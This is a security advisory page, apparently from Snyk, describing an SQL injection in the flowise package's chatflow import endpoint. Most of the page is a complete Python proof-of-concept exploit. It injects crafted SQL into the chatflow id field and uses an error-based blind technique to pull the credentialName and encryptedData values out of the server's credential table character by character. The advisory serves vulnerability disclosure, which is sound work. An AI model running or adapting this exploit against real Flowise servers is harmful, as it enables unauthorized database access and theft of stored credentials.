SQL Injection: Hibernate affecting the flowise package, all versions (*)


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application, see which of its components are vulnerable, and suggest quick fixes.

Test your applications
  • Snyk ID: SNYK-JS-FLOWISE-9734391
  • Published: 17 Apr 2025
  • Disclosed: 7 Apr 2025
  • Credit: Tribal1012

Introduced: 7 Apr 2025

New CVE NOT AVAILABLE CWE-564  (opens in a new tab)

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

flowise is a Flowiseai Server

Affected versions of this package are vulnerable to SQL Injection: Hibernate via the importChatflows process. An attacker can execute arbitrary SQL commands by injecting malicious SQL code into the input parameters.

PoC

import argparse
import requests


def import_chatflows(url: str, token: str, payload: dict):
    """POST ``payload`` as JSON to the chatflow import endpoint under ``url``.

    The request carries ``token`` as a Bearer credential in the
    ``Authorization`` header. The response body is decoded as JSON and
    returned to the caller.
    """
    endpoint = f'{url}/api/v1/chatflows/importchatflows'
    # The original PoC notes that a 'Basic {token}' Authorization value is an
    # alternative to the Bearer scheme used here.
    auth_headers = {'Authorization': f'Bearer {token}'}

    reply = requests.post(endpoint, headers=auth_headers, json=payload)
    return reply.json()


def import_normal_data(api_url: str, token: str, normal_data: str):
    """Import one ordinary chatflow record and return its fixed id.

    The record uses the hard-coded id ``'aaaaaa'``, takes ``normal_data`` as
    its name and has an empty JSON object as flow data. The server's reply is
    ignored; only the id is returned.
    """
    data_id = 'aaaaaa'
    record = {
        "id": data_id,
        "name": normal_data,
        "flowData": "{}"
    }

    import_chatflows(url=api_url, token=token, payload={"Chatflows": [record]})
    return data_id


def get_character(api_url: str, token: str, data_id: str, column_name: str, index: int):
    """Recover a single character of ``column_name`` one bit at a time.

    Seven import requests are issued, one for each bit value from 64 down
    to 1. Every request places a crafted string in the chatflow ``id`` field
    that compares the ASCII code of the character at position ``index``
    (the position handed to SQL ``substr``) with a candidate threshold.
    A bit is kept whenever the ``message`` field of the reply contains
    ``'DOUBLE value is out of range'``.

    Returns the character whose code is the sum of the kept bits.
    """
    subquery = f'(SELECT ascii(substr({column_name},{index},1)) FROM credential limit 0,1)'

    code_point = 0
    for shift in range(6, -1, -1):
        threshold = code_point + (1 << shift)
        crafted_id = f"{data_id}') and if (({subquery})<{threshold}, 0, 9e300 * 9e300); -- "
        request_body = {
            "Chatflows": [
                {
                    "id": crafted_id,
                    "name": data_id,
                    "flowData": "{}"
                }
            ]
        }

        reply = import_chatflows(url=api_url, token=token, payload=request_body)
        # The overflow error is only reported when the compared value is not
        # below the threshold, so the bit under test belongs to the result.
        if 'DOUBLE value is out of range' in reply['message']:
            code_point = threshold

    return chr(code_point)


def get_length(api_url: str, token: str, data_id: str, column_name: str):
    """Recover the length of ``column_name`` one bit at a time.

    Nine import requests are issued, one for each bit value from 256 down
    to 1, so the largest length that can be reported is 511. Every request
    places a crafted string in the chatflow ``id`` field that compares the
    SQL ``length`` of the column with a candidate threshold. A bit is kept
    whenever the ``message`` field of the reply contains
    ``'DOUBLE value is out of range'``.

    Returns the sum of the kept bits as an integer.
    """
    subquery = f'(SELECT length({column_name}) FROM credential limit 0,1)'

    measured = 0
    for shift in range(8, -1, -1):
        threshold = measured + (1 << shift)
        crafted_id = f"{data_id}') and if (({subquery})<{threshold}, 0, 9e300 * 9e300); -- "
        request_body = {
            "Chatflows": [
                {
                    "id": crafted_id,
                    "name": data_id,
                    "flowData": "{}"
                }
            ]
        }

        reply = import_chatflows(url=api_url, token=token, payload=request_body)
        # The overflow error is only reported when the length is not below
        # the threshold, so the bit under test belongs to the result.
        if 'DOUBLE value is out of range' in reply['message']:
            measured = threshold

    return measured


def main(url: str, token: str):
    """Run the proof of concept against the server at ``url``.

    A baseline chatflow is imported first. Then, for each of the columns
    ``credentialName`` and ``encryptedData``, the column length is recovered
    and printed, followed by the column value rebuilt character by character.

    This demonstrates the advisory's finding and is meant only for systems
    you are authorized to test.
    """
    api_url = url
    data_id = import_normal_data(api_url=api_url, token=token, normal_data='flow01')

    for column_name in ('credentialName', 'encryptedData'):
        column_len = get_length(
            api_url=api_url,
            token=token,
            data_id=data_id,
            column_name=column_name
        )
        print(f'[+] {column_name} length is {column_len}')

        # Positions passed down are 1-based, matching the index the helper
        # forwards to SQL substr.
        recovered = [
            get_character(
                api_url=api_url,
                token=token,
                data_id=data_id,
                column_name=column_name,
                index=position
            )
            for position in range(1, column_len + 1)
        ]
        result = ''.join(recovered)
        print(f'[+] {column_name}: {result}')


if __name__ == '__main__':
    # Command-line entry point: --url is optional and has a default,
    # --access is mandatory and is passed to main() as the token.
    cli = argparse.ArgumentParser()
    cli.add_argument('--url', type=str, default='http://flowise:3000')
    cli.add_argument(
        '--access',
        type=str,
        required=True,
        help='Get from http://flowise:3000/apikey'
    )

    parsed = cli.parse_args()
    main(url=parsed.url, token=parsed.access)

CVSS Base Scores

version 4.0
version 3.1